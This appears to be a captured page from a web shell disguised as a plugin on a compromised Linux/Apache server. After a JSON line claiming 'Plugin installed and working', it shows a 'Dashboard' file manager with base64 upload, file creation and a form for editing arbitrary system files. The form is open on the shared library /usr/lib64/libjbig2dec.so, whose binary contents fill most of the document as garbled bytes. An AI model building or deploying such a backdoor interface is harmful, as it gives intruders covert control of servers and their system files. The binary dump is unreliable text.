{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-22 01:11:12"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Flib64">lib64</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Flib64" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: libjbig2dec.so.0.0.0</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/lib64/libjbig2dec.so.0.0.0">
                    <textarea name="edit_content">ELF          &gt;    �;      @       ��         @ 8  @                                 p/      p/                    0       0       0      �     �                   P      P      P     h�      h�                   0�     0�     0�     �      �                   @�     @�     @�                                �      �      �                                   �      �      �      $       $              S�td   �      �      �                             P�td   �     �     �                        Q�td                                                  R�td   0�     0�     0�     �      �                      GNU   �                   GNU ȍ����(y���:�k`    a         
   � 4@� &quot;@4���A� !�  $!� � ��  @      � @     � �6H(&quot;b��L$@�  0 @	��$ &quot;� �@�*@@@@0�� ` F���H�@	&quot;             !   #           $   %   &#039;   )               +   .   0   1       2   3   4   6   9       :   &lt;   &gt;       ?   @       C   D                   E   F   H   J   K   O   P   Q   R       T   V   W   Y   Z   [   ]   `   d   f   g   i   m   r   t   v       w   x       y   |           }              �   �       �       �   �   �               �   �   �       �   �       �   �   s6��:OCt����G� �o�M���T�U�ސ8+���_=`�d^CӨj�=��ϵ*u���������aγWP���v=s��̚T��T��z/��RM|�9z^��`Z�U�[ꕼ�@�&gt;yI��.��r^4^��$v�v�0_]Z�[��kM4qB&gt;m�0�h�!�LM!]��W�$H�&amp;�6��hD�z�({i���Qc
+_=x]�{^�7�2���[�Kt[�Kt�~&gt;�]�Kt]�Kt_�Kt΃�_�Ktb�p`�Kt+�gS�S��`�Kt2����� ��c�Ktc�Kt��e�Ktd�Kt������ۖ�uf�Kt�q7�~�2Pf0��ff�KtI�Odh�Kt�I��](�7M��2�1�&quot;�]���S��W�_?�0��El��0��ےK�g�7z&lt;������r��c&gt;2~���ÜK�Z=�ُ!V�[�B��AX+�:��I�y�ZH���,�-�
3)��nl������_��:�̈́5��;&gt;�L��8�ۍ�                            &gt;                     �                                             �
                     n                     �                      �                     w                      c
                     j                      �                     �                     ^
                                            ~                      �                     p                      w
                     �                      v                     �                     h                     F                     \                      ,                       F   &quot;                   i
                     U                      �    �d            �    �G      &quot;      �    `Y      )      �    0
     	       �    	            �
    �?     �      R    �	                �	            �    @L                 �     C       4     N                 0M      �       �    �P             �    `            �    �I      �          0C             �    �      �&amp;          �f      �       �	    �                �     C       �    �e             �     @&gt;      +      %	    �
            �    
     	       �    p	                �	            ~    �F      P      	    �
            �	    �     �      �    pf      a       �     
     	       �    ��      �       �     �B             Y    O      �       T    �l      S      8
    p      a       �	    �     �      		    p
            &#039;    �	                �]      9       2	    �
            
    �     L      C    �C      v      .    `h      	       K     �            
          9       j    n      �           �]      $      u     	            M    �     m       l    �O      �       �
     $           �    P
            �	    �     8      U    PF             �     c      �           ��                �            �    P	            4     �            �    0�                 �            �    �e      �       $    ��                �g      �       �    ��            �     I      �       �    @	            �    ��            p    pb      �       G    0N      �       �     �B      %       R    ��            i    ��                @C      u       �    ��            ;    p�            8    �C             y    �n      �       A    pa      �       �    `�            ]	    �
            �     d      �       �     
     	       $
    P             �    P�            �     	            �    ��            �
    �#     j       �    �o      �      �    T            H	    �
            �    0	            q	    �
            �    �	            �    PL      �       .     a      o       �
    @*     M      ;    �	            �    ��      Z      �
    �0     S      �	    �     �      �      &gt;             �    `
            �    `	            �    ��      �      �     �      �&#039;      �    pP             r    �	            p    `F      3           �M      9       R    b      R       �      C      	       ~    p�      �       �    @
            �    �c             �    �           0    @     O       �     �B             �     Y      9       j     �      �      I
    �      �      �    �Q      �      �    �     $       b    �	            D    ph      &gt;       __gmon_start__ _ITM_deregisterTMCloneTable _ITM_registerTMCloneTable __cxa_finalize stderr __fprintf_chk fputc fflush memset memcpy jbig2_alloc jbig2_error __vsnprintf_chk strncpy __stack_chk_fail jbig2_get_int16 jbig2_get_uint16 jbig2_get_int32 jbig2_get_uint32 jbig2_make_global_ctx jbig2_word_stream_buf_new jbig2_free jbig2_ctx_new_imp jbig2_word_stream_buf_free jbig2_realloc jbig2_arith_new jbig2_arith_decode jbig2_arith_int_ctx_new jbig2_arith_int_decode jbig2_arith_int_ctx_free jbig2_arith_iaid_ctx_new jbig2_arith_iaid_decode jbig2_arith_iaid_ctx_free jbig2_huffman_free jbig2_huffman_new jbig2_huffman_skip jbig2_huffman_advance jbig2_huffman_offset jbig2_huffman_get_bits jbig2_huffman_get jbig2_build_huffman_table jbig2_release_huffman_table jbig2_table jbig2_table_free jbig2_parse_segment_header jbig2_find_segment jbig2_find_table jbig2_get_region_segment_info jbig2_end_of_stripe jbig2_sd_new jbig2_sd_glyph jbig2_sd_count_referred jbig2_sd_list_referred jbig2_generic_stats_size jbig2_release_page jbig2_sd_release jbig2_free_segment jbig2_ctx_free jbig2_global_ctx_free jbig2_page_info jbig2_page_add_result jbig2_page_out jbig2_sd_cat jbig2_decode_text_region jbig2_text_region jbig2_huffman_params_G jbig2_huffman_params_H jbig2_huffman_params_K jbig2_huffman_params_N jbig2_huffman_params_A jbig2_huffman_params_F jbig2_huffman_params_L jbig2_huffman_params_I jbig2_huffman_params_J jbig2_huffman_params_M jbig2_huffman_params_O jbig2_decode_generic_region jbig2_symbol_dictionary __memcpy_chk jbig2_huffman_params_D jbig2_huffman_params_E jbig2_huffman_params_B jbig2_huffman_params_C jbig2_immediate_generic_region jbig2_parse_segment jbig2_end_of_page jbig2_data_in memmove jbig2_complete_page __assert_fail jbig2_image_reference jbig2_image_compose jbig2_image_clear jbig2_image_get_pixel jbig2_image_set_pixel jbig2_image_write_pbm fwrite jbig2_image_write_pbm_file fopen fclose Memento_breakpoint Memento_checkBlock Memento_checkAllMemory Memento_check Memento_setParanoia Memento_paranoidAt Memento_breakAt Memento_getBlockNum Memento_find Memento_failAt Memento_breakOnFree Memento_breakOnRealloc Memento_takeRef Memento_dropRef Memento_adjustRef Memento_reference Memento_malloc Memento_free Memento_realloc Memento_calloc Memento_listBlocks Memento_listNewBlocks Memento_setMax Memento_stats Memento_label Memento_info Memento_listBlockInfo Memento_startLeaking Memento_stopLeaking Memento_squeezing jbig2_mmr_white_decode jbig2_mmr_black_decode jbig2_decode_generic_mmr jbig2_decode_halftone_mmr jbig2_decode_refinement_region jbig2_image_new jbig2_image_free jbig2_image_release jbig2_hd_release jbig2_image_read_pbm feof fgetc __ctype_b_loc __isoc99_sscanf fread jbig2_image_read_pbm_file jbig2_refinement_region jbig2_pattern_dictionary jbig2_halftone_region jbig2_image_resize libm.so.6 libc.so.6 libjbig2dec.so.0 GLIBC_2.3 GLIBC_2.7 GLIBC_2.14 GLIBC_2.3.4 GLIBC_2.4 GLIBC_2.2.5                                                                                                                                                                              ii   &amp;     ii   0     ���   :     ti	   E     ii   Q     ui	   [      0�            �&lt;      8�            `&lt;      @�            @�     X�            �     h�            @�     x�             �     ��            ��     ��            ��     ��            �     ��            ��     ��            `�     ��            `�     ��             �     ��            ��     �             �     �            ��     (�            �     8�            @�      �            @=      �            P=      �            `=      H�        a           P�                   X�        f           `�        i           h�        r           p�        \           x�        9           ��        Y           ��        V           ��                   ��        e           ��        h           ��        m           ��        t           ��        ^           ��        /           ��        U           ��        Z           ��        X           ��                   ��                   ��                   X�        �           `�                   h�                   p�        F           x�        �           ��        %           ��                   ��        &gt;           ��        )           ��                   ��        �           ��        |           ��        @           ��        &#039;           ��        :           ��        d           ��        +           ��        �           ��                   ��        L           ��        A            �                   �        �           �                   �        (            �        .           (�        j           0�        P           8�        �           @�        �           H�        ]           P�                   X�        O           `�        �           h�                   p�        	           x�        
           ��        �           ��        �           ��        g           ��                   ��        -           ��        &lt;           ��        R           ��                   ��                   ��                   ��        *           ��        �           ��        �           ��        J           ��                   ��                    �                   �        7           �        �           �        o            �        b           (�                   0�        1           8�                   @�        �           H�        &amp;           P�                   X�        2           `�        k           h�        }           p�        �           x�        T           ��        �           ��        &quot;           ��        c           ��                   ��        �           ��        �           ��        S           ��        _           ��        ~           ��                   ��        D           ��        �           ��        w           ��                   ��                   ��        v            �        q           �        =           �        �           �        l            �        I           (�        0           0�                   8�                   @�        ?                                                                                                                                                           ��H��H��� H��t��H���     �5&quot;� �%#�  ��h    �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h	   ��Q������h
   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h   �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h   ��Q������h   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h    �������h!   ��������h&quot;   �������h#   �������h$   �������h%   �������h&amp;   �������h&#039;   ��q������h(   ��a������h)   ��Q������h*   ��A������h+   ��1������h,   ��!������h-   ��������h.   ��������h/   ������h0   �������h1   ��������h2   �������h3   �������h4   �������h5   �������h6   �������h7   ��q������h8   ��a������h9   ��Q������h:   ��A������h;   ��1������h&lt;   ��!������h=   ��������h&gt;   ��������h?   ������h@   �������hA   ��������hB   �������hC   �������hD   �������hE   �������hF   �������hG   ��q������hH   ��a������hI   ��Q������hJ   ��A������hK   ��1������hL   ��!������hM   ��������hN   ��������hO   ������hP   �������hQ   ��������hR   �������hS   �������hT   �������hU   �������hV   �������hW   ��q������hX   ��a������hY   ��Q������hZ   ��A������h[   ��1������h\   ��!������h]   ���������%=� D  ���%5� D  ���%-� D  ���%%� D  ���%� D  ���%� D  ���%� D  ���%� D  ���%�� D  ���%�� D  ���%� D  ���%� D  ���%ݵ D  ���%յ D  ���%͵ D  ���%ŵ D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%}� D  ���%u� D  ���%m� D  ���%e� D  ���%]� D  ���%U� D  ���%M� D  ���%E� D  ���%=� D  ���%5� D  ���%-� D  ���%%� D  ���%� D  ���%� D  ���%� D  ���%� D  ���%�� D  ���%�� D  ���%� D  ���%� D  ���%ݴ D  ���%մ D  ���%ʹ D  ���%Ŵ D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%}� D  ���%u� D  ���%m� D  ���%e� D  ���%]� D  ���%U� D  ���%M� D  ���%E� D  ���%=� D  ���%5� D  ���%-� D  ���%%� D  ���%� D  ���%� D  ���%� D  ���%� D  ���%�� D  ���%�� D  ���%� D  ���%� D  ���%ݳ D  ���%ճ D  ���%ͳ D  ���%ų D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%}� D  ���%u� D  ���%m� D  ���%e� D  ���%]� D  ���%U� D  H�=!� H�� H9�tH�F� H��t	���    ��    H�=� H�5� H)�H��H��?H��H�H�tH��� H��t��fD  ��    ���=��  u+UH�=r�  H��tH�=�� �9����d������ ]� ��    ���w����    AVA��I��I��SH�1���H�ރ�H��DҍJ�B���)�D�J���    ������	�A9�t(���A����A���A��AEփ�	�A9�u�Ic�D��H�[A^I���������!���    ��H����@ ��H������@ ��H��H���a��������t�fD  AT1�A��H�r SH��   H��H�N� H�;���A���u H�3�
   ���H�;H��[A\���@ H�;D��H�A 1��   �W�����D  �WH���u�0�������H�H�&lt;����ff.�      ��H��H��tH��H��pH��&#039;1�� ��AUA��ATA��USH��H���  L��$P  L��$X  ��t@)�$`  )�$p  )�$�  )�$�  )�$�  )�$�  )�$�  )�$�  dH�%(   H��$(  1�H�l$ I��I��H��$  �   �   H��H�D$�   H��$0  �$    �D$0   H�D$�����x@=   t9H�{ D��D��H��SH��$(  dH+%(   u,H���  �����[]A\A]� �   H�5 H����������D  ��H��H��H����   H����   H�~H9�vkH�vL�HA�   ���L9�vD�DA��D	�A�   L�HL9�vD�LA��A��D	�L�HL9�w�
D���D  �DA��	��� E1��    D��� H�y ������   1�����     ATUH��SD�fE����  H�VH��H����  �F�������   td��H���FH�Vu,H�F H�V(H�NH�����S  H�H�C��   HC(�C�3������ �  )�C   D��[]A\��    H��tB�������w����	H���F   �F��� � H�V �  )ȉD��[]A\��    H�F H�V(H�NH������   H�H�� H�CtO�SHC(H�C(���������vp��H���C   ��   �H�C   �SH�C(�A����     H�� ������   H��1��u���� �  H�     ��H�CH�C   ���@ ���	�C    �  )ȉ����fD  �C   H�� [H�����]�   1�A\�
���f.�     �C   H�R ��H�� ������   H��1�����A������s���H�� �ؐUH��SH��H���V��    �C���#�S��C�Āu��u�H��H�������x�S�� H��1�[]��    H��H��H�� 1�[������   ]�G����    ���f���@ ���f���@ ����Wf��f��f ����   �	��ff.�     ������    ��H����     ��AUI���   ATUH��SH�Ӻ   H��H�?��I��H��t&#039;H�����M�l$I�$I�\$H��L��[]A\A]�@ ������   H��1�H�&quot; �]�����ff.�     ���gf�     ��AWAVAUM��E��ATUSH��H��   dH�%(   H�D$x1�E����  ��$�   ��  H��H��H�ޫ A��HD�I��H�ɺ   H�5����x   H��HD����I��H���(  H�(�   �   H��D�pA��L�xH�XL�h D�pHH�@(    �@`    �@T   ��I�D$XH����   I�&lt;$�0   �   H�       A�D$d    I�D$h�L�I�D$pH���)  A�T$l��tgH�RH��H�f.�     1��     H��0�@�    �@�    �@�����@�    �@�    f�H��@�    �@�    �@� H�@�    H9�u�H�D$xdH+%(   ��   H�Ĉ   L��[]A\A]A^A_�D  ������   H�5� L�����     ������   H�5� L���L��H��E1�����f.�     H�\$H��   1�L�l$ H� �����E1�jj D��$�   ��^_�G���������   H�5l L���I�t$XH����L��H��E1��t�������f.�     ��H�?�T�@ ��I��H��tH�����1�H��L9�vH��I��gf�     1��ff.�     f���AT�0   UH��SH�?H��   �`�I��H���  1��@    H�HH��H�X H��H�@(    �����   H�I�D$tJID$(A�D$L��H�����%  � A�$��������   A�l$A�D$ �  A�$$L��[]A\� H�} L��E1��Y�H�����1�H�� �   ��L��[]A\�fD  H�} L���$�H�M H��E1�����   1��f�L��[]A\�fD  H�} L�����H�� �� ������   H��1�H�� �%��M�����ATH��UH��H����Љ׃���&lt;.��   D�L��R �F��E��D��D��D)���F9�vA�Āu-�A9���   �   D)�A��A�D�H��1Ј�����xDH��D��]A\�@ ��D�N��A)�D�A9�wd�   D)�A���A2D��H�������y�H�t ������   ��     H�� ������   H��H��1�]A\��fD  �A2D��fD  A�D�1��ff.�      ��AT�   �   UH��H��H�?���I��H��t@H�xH��H�     Hǀ�      H��1�H)���   ���H�H��L��]A\��    ������   H��1�H�z �m���ff.�     ��AWI��AVAUATI��H�VUH��L��SH��(H�L$��H�k �D$����  �\$L��L����Hc�H����D$����  �D$��D$   	�A�΅���   E1�1�@ Ic�L��L��H������  D��C�6�A����   ��  	�	�	�A��D9l$u��t$������)��A��9ڋT$DL�D��؅�DE�H�D$��D�(1�E����H��([!�]A\A]A^A_� Hc�L��L��H���H�� ����   C�6�D$   	��D$   A�΅��&amp;���Hc�L��L��H����H� ����   C�6�D$   	��D$   A�΅����Hc�L��L��H���H�f ��xyC�6�D$T   	��D$   A�΅������Hc�L��L��H��X�H�Q ��x&lt;C�6	����A�΁� ��T  ����|$��� �D$�Z��� H�q H��(L�������1�[�   ]A\A]A^A_���    H��(E��L�������[H�F ]�   A\1�A]A^A_���ff.�     ���H�?�d�@ ��AUH�� ATUH��SH��@��?wuH�?���A�   �   �   I����I��H��t{�H�} �   L���x�I�D$H��H��tL��1��q�H��L��[]A\A]� H�} L�����H�� H������   1���E1�H��[L��]A\A]��     ������   H��1�H�* ���� ��AWAVAUATUSH��D�&amp;L�nH�L$E��t_I��H��E1��   �@ �A��	�E9�tCHc�H��L��L��j���y�H��L��H�� 1�[�����]�   A\A]A^A_�]��   D��   ��)�H�D$�H��1�[]A\A]A^A_�@ ��H��t/UH��SH��H��H�vH�?��H�;H��H��[]��fD  ��    ��H�?��@ ��AT�(   UH��SH�?H��   ���I��H����   H��H�@    1�H���@    H��H�XH�h �H�9 ��x,I�D$I�|$ I�L$�   H����xL��[]A\�H�1 H������   1��E�L��H��E1���L��[]A\��    ������   H��1�H� ���ff.�     ��S�GH����t&quot;�   �    )֋W�G)��?�����	����vG�S�CH�KH�{ ��B���CH�CH����x)�C�� �Ct�S�    �3)�����	�1�[�@ H�{ H�� 1�[������   �[�ff.�     �����SH�����Ww�W�w��v���� �W�wH�CH�{ H��H����x&lt;H�C�SH�KH�{ ��H����xA�S��t�C�    �;)������	��1�[�H�{ H�% ������   1�[�� H�{ H�= �� ���G��G�f���ATUSH���?�C��t	;C��   �C�    A���S��)��CA��vT�K�� L�C��CH�C�q�QH�{ L���sH����xx�S��t/�C��3)������	�D��[]A\�fD  ��)������	��D��[]A\�f.�     �����H�{ �����1�D�CH�� [�   ]A\��fD  H�{ H�� [1�]������   A\����AWAVAUI��ATUSH��(�oH�T$�WdH�%(   H�D$1����tD�GD9���  A�    �D  H�3�H�^��~D��)щ���H��H�D�s
�KA����0  ���   �$  E�e�D�d$��~8A�UI�} H�L$�B��A�EI�EH�����|  �D$�� ��A�ED���t��T$D��)���	�A���_����S	D�;��tm�    ��D��)���)�D�A��D��A���t$���&lt;  A�UI�} H�L$�B��A�EI�EH������   �t$A�u�� ��   ��1�A�E H�D$A�mH��tA��D�0H�D$dH+%(   ��   H��(D��[]A\A]A^A_��     H�D$H��t� ����I�} ������   1�H�	
 ��A����    H�D$H��t
� ����D�GH�D$dH+%(   upI�} H��(�����1�[H��	 ]�   A\A]A^A_�Z�f.�     I�} ������   1�H�9	 �4�A��������؉���    )���	�����_�ff.�     @ ��AW�   AVAUATUSH��hH�ND�nH�|$PH�?H�t$�   H�L$H���H�D$8H���  L�|$81�I�L��I�    IǇ�      H��H)���   ���H�H�D$�x����  D�l$H�l$H1�E1����I���3 IcƉ�A���ED�AM�9�M؃�M�A��H��E9e~8D�u A9�~ǍFA9��A  D��H�)�I�&lt;�1���H��   ��D��뙐�   �ىt$\D�l$��\$X�D$H�\$PD�D$X1�1�H�i �����H����H�;�   �   ��H�D$@H���!  H�D$@�L$X�   �\$�H�D$PH��H�8��H�D$H���  H����   H��H�\$H���i�H�D$@�t$\H��H�XH�D$8�     ���\  H���D$,    A�   1�H�L$0A�M��L$(D�l$�L$XD$,D�T$ 1ۋT$�H�|$HE��D)щD$,A�ÉL$���  @ ��H��9\$��   D9u�D$D��A��D�GE�߉���A��D;|$�N  H�D$� ���/  9\$(�   A���T$)�D�ȃ�9�DDȋD$ D�����   D9�s�D��A�   D�\$$��A��L$E��H��A��A��HT$D)�E�f.�     D�_��D�B���B	 D!�D��D�J
)�D�E��EŃ�H���B�A9�u�D�\$$��H��9\$����fD  I��D9T$\��   H�D$8B�D�����f�D9�����A)���WA�w�H��H�H��HD$H��Ht$0 �H��D�p�D�@�D�H�H9�u����@ E1ɸ   ���� H�\$PD�L$E��1�H�&quot; ������   H����L�t$@H�;I�v���H�;L�����H�t$8H�;���H�D$@    H�D$@H��h[]A\A]A^A_�D���r���H�D$PH�t$8H�8�X�����D$   �D$X    �D$\��������H�|$P������   H� �~�H�D$@    �H�\$P������   H��  H���U�H�t$8H�;�����]���H�\$P������   H�� H���%�H�t$@H�;���H�t$8H�;���H�D$@    ����ff.�     f���H��t/UH��SH��H��H�vH�?�o��H�;H��H��[]�^��fD  ��    ��AWAVAUATUSH��xH�|$(H�t$@dH�%(   H�D$h1�H�~	H�F0    ��  �*I��H�zH���A����A����D$WA��A�����0��I�|$A���D$P���H�sA�.�D$Hc�H��    E���f  C�6Hc�H)�1�H��   HЋ|$I��	H�D$`    H�D$8H������H�D$9|$P��  H�D$(�   �   H�8����H�D$HH����  H�D$(H�t$8�   H�8���H�D$0H����  Ic�L�|$0�\$PH�D$    H�D$ L�l$`��    H�L$H�D$ HD$`H;D$��  D��L��L�����A�Hc�HD$`H;D$��  ��L��L��I����A�_���A�G��   ���H�D$H�H9\$�L�|$ H�D$`H�L$XH�l$L�H9��O  D��L��L���Y�H�L$X�T$PH�l$A��H�D$0H�I��H��H�D� �@    �PH�D$`L�H9���   L��D��L���	��|$�|$W A��H�D$0H�D�xH�|$D� �@    H�ot?L|$`L;|$��   D��L��L����H�l$A��H�D$0H��H�DD� H�@    H;l$8��   H�T$HH�|$0�D$WH�zH�|$@�1��jH�W0H�T$hdH+%(   �.  H��x[]A\A]A^A_� C�vHc�H)�1�H��   ���H�D$0    H�D$H    D  H�6�  H�D$@H�|$(�   �1��Y��H�\$(H�t$0H�;����H�t$HH�;����������b���H�D$(H�t$0�   H��H�8���H��tyH�D$0����H�D$@H�|$(�   H���  �1�����H�D$0    H�D$H    �x���H�D$@H�|$(�   H��  �1����H�D$0    �K���H��  �&#039;���H� ���������    ��H��t/UH��SH��H��H�vH�?���H�;H��H��[]����fD  ��    ��AWAVE1�AUATUSH��8H�L$H��
�L  H��H�?H��I�վ   �8   ���I��H����  H������H���  �   A�����\  �CA�FD�{D�������  �D$   A���
   E��E�~D��A�   ��   v��   ��   C�4?A�   ��@&lt;�1������|$(��L9���  H�D$     E����   �|$H�D$ H߃|$(I�F ��  D�d$D�A��A�E�N1�H�\  H��1�A�����A�F(����D��H�&lt;����A�t$��I�FH�D$H�0I�F0    H��8L��[]A\A]A^A_�fD  B�4�    A�   �.���D  H�{���A�%���A��A�O���A	���D$A�F�����H�} �   �r��H�D$ H���$  H�D$ A�w�H�\$�t$,I��J��L�=d�  H�D$�D$L��A���7 A��tJ���A��D�A�L��1�H��1�E�H��A������H9\$t,D��H|$A��u�D����     �+��D���D  �D$H�\$D�D�d$,D�D$�^���f����D�d$A��A���n���f.�     H�1�  1�H��1��m��H�} L��E1�������f�     ������   H��1�H��  �5���`���A�H�.�  �   H���ff.�     ����Gd��x$H�WXH��@ H����xL��A90u�L��� L�GM��t�A�@d��x&amp;I�PXH��fD  H����xL��A90u���D  E1�L��Ð��AVI��AUI��ATA��US�F��~H1�1��fD  H��A9]~2I�E L���4����H��t��P��?��5u�A9�t9��H��A9]�A�U E��L���   H�1�  1����[1�]A\A]A^�@ [H�@0]A\A]A^� ��UH��SH��H��H������H�}�����H�}�C����H�}�C�����C�E�C���CH��[]�ff.�      ��AUATUH��SH��H��H�~L�op�GhvnH�@H��H��I��k��E�E A��A9�w/�A��H�+�  H��   1��D��E�e H��1�[]A\A]� �E��H���  A���   H��1�����̋H��H���  1�[�   ]A\A]�������AU�   ATUH��S��   H��H�?����I��H��tsH�} A�ݺ   L�����A�$I�D$H��H��tJ��    1����H��L��[]A\A]Ð��t�����   H��1�H���  �a��H�} L��E1�����������   H��1�H�B�  �5��� ��H��tH�G��H���@ 1��D  ��AUATUSH���N��~[I��H��1�E1�H�E L��4����H��t$�@?uH�@0H��t���tH�@H�8A�� H��9]�H��D��[]A\A]ÐH��E1�[D��]A\A]�ff.�     @ ��AWI��AVAUATUH��SH������H�} �   ��H���`��I��H����   A�OE1�E1��~PfD  I�G H��B�4��@��H��t+�@?u%H�@0H��t���tH�PH�: tD��A��I�ԐI��E9w�D9�uH��L��[]A\A]A^A_��    A�E��A��H�h�  �   H��1����H�} L��E1��:���A�H��  H��1��   ����ff.�     f����   ��t���    �   E��f���H����   UH��SH���Gl��t[H�@H�Wp1�H��� H��0H9�t?H;t(u�H���X��H]pH��1��   D�CH��1�[H��  �����]����@ H��H��H��  1�[������   ]����    �ff.�     @ ��H��tWATI��UH��SH�vH��t&amp;�E ��t1� ��L���H�4����9] H�uw�I�&lt;$���I�&lt;$[H��]A\����D  �ff.�     @ ��H��twUH��SH��H��H�v H�?����E��?&lt;ttv2&lt;(t6&lt;5uH�u0H��tH������H�;H��H��[]�x���     ��t$&lt;u�H�u0H��t�H�������D  ��    H�u0H��t�H���w���D  H�u0H��t�H���?���ff.�     f���ATUSH����   L�&#039;H�w(H��L������H�uXH��t.�E`��t1� ��H���H�4����9]`H�uXw�L�����L�EpM��t81� ��H�@H��I�t (H��tH���&lt;��L�Ep��9]hs�L��L���u��H��L���j��L��[]A\�f�E1�[]L��A\�D  ������    ��AWI��AVAUATI��USH���GhH�wpH�T$H�@H��H�D�[�E���R  ����  L�pA�����O�vI��L���f�I�wpH�.D�H��0E����   I��A�WlH��L9�w؃����  M�����=���?wD��    L��A�WlI�?�0   L���q��H��H����  A�WlI�GpH�(I9�s�H�RH��H��H�fD  �     H��0�@�    H�@�    H9�u�D�H��0E���Z���A�D$I�|$E�wh�   �C�d  L�t$L���W��I�~�C�K��I�~�C�?��I�~�C�3���CA�F�C$����  H�|$H���b��f���1  E1Ƀ{��C    fD�K�_  I�|$�C     �&#039;  �C�KD�KD�CA�$����  �s9���  H��L��V�   P1�QH���  ���H�� �S����  �S�s����_  L�����H��H�s(H����  �S$L��������H�C(H��L��H���  1�D�H�PA��RA�$D� 1��(��H��(1�[]A\A]A^A_��    I�ƅ�������~���A�$H���  �   H��L��1�[]A\A]A^A_����f%�I�|$�C   f�C�C     ����A�$H��  L��1��   �������   A�$�   1�H���  �z��A�GhI�wpH�@I��H��H��P���A�$H�z�  �   �X���A�$H���  �   �C���A�$H���  �   �.����SL���B��H�����D�CA�$�   1�H�j�  L�������Z���H��L���   QH�z�  ����_AX�.���P�   L��1�QH���  ���Y^����A�$H���  �   ���A�$H���  L��1��   �w����  �C   f�C�r���f���AW��AVI��AUATUSH��D	�xTH��H�v(H����   �CI��A��D�Ņ�t�{�t^A��D��L��L���������   H��1�[]A\A]A^A_�@ H�